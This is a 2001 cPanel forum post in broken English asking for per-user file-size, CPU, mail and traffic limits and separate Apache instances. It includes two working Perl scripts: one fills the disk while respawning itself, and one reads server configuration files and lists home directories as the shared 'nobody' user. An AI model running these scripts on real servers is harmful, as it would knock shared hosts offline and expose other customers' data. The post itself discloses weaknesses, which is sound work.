The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

BUGS CPANEL

Discussion in 'General Discussion' started by 70809, Oct 2, 2001.

  1. 70809

    70809 Registered

    Joined:
    Aug 15, 2001
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    1. It is necessary to enter restriction on the maximal size of a file.
    That the user could not create/upload files more than 1file >100mb.

    I explain:

    Having started such script, in some minutes the server simply will decay:


    #!/usr/bin/perl
    while (true)
    {
    open(tmpfile,\">>tmp\");
    print tmpfile \"hack\"x2000;
    close(tmpfile);
    `perl xexexe.pl`
    }



    2. It is necessary to start SEPARATE COPY APACHE for each user.
    Now any user has rights NOBODY. It IS PARADISE FOR Hachers! :)

    Thanking such scripts any user can see(overlook) any file on a server where it is established CPANEL:

    #!/usr/local/bin/perl

    use strict;
    use CGI qw:)standard);
    use CGI::Carp qw(fatalsToBrowser);
    my $cgi = new CGI;
    print $cgi->header(\'text/html\');
    $/ = undef;
    open(ff, \"< /etc/httpd/conf/httpd.conf\") or die \"$!\";
    my $var = <ff>;
    close(ff);
    print $var;
    #opendir(DIR, \"/home\") || die \"can\'t opendir: $!\";
    #my @dots = grep {-d \"/home/$_\" } readdir(DIR);
    #closedir DIR;

    #print \"$_\\n\" for @dots;

    #open(FILE, \"> ../****.txt\") or die \"$!\";
    #print FILE $var;
    #close(FILE);






    3. it IS NECESSARY TO ENTER LIMITS FOR USERS!
    That there was a restriction on the maximal volume of accepted mail.
    That there was a restriction on the maximal loading by the user of the processor of a server.

    Without these things, any programmer can break open with ease any server on which costs(stands) CPANEL.

    I can show breaking of a server free-of-charge:))









    4. It is necessary to take into account ALL traffic.

    Now it is taken into account only http the traffic, and emails, ftp it is not taken into account.

    It is silly.







    PS. I bring apologies for bad English as I while very badly know it(him).
     
Loading...

Share This Page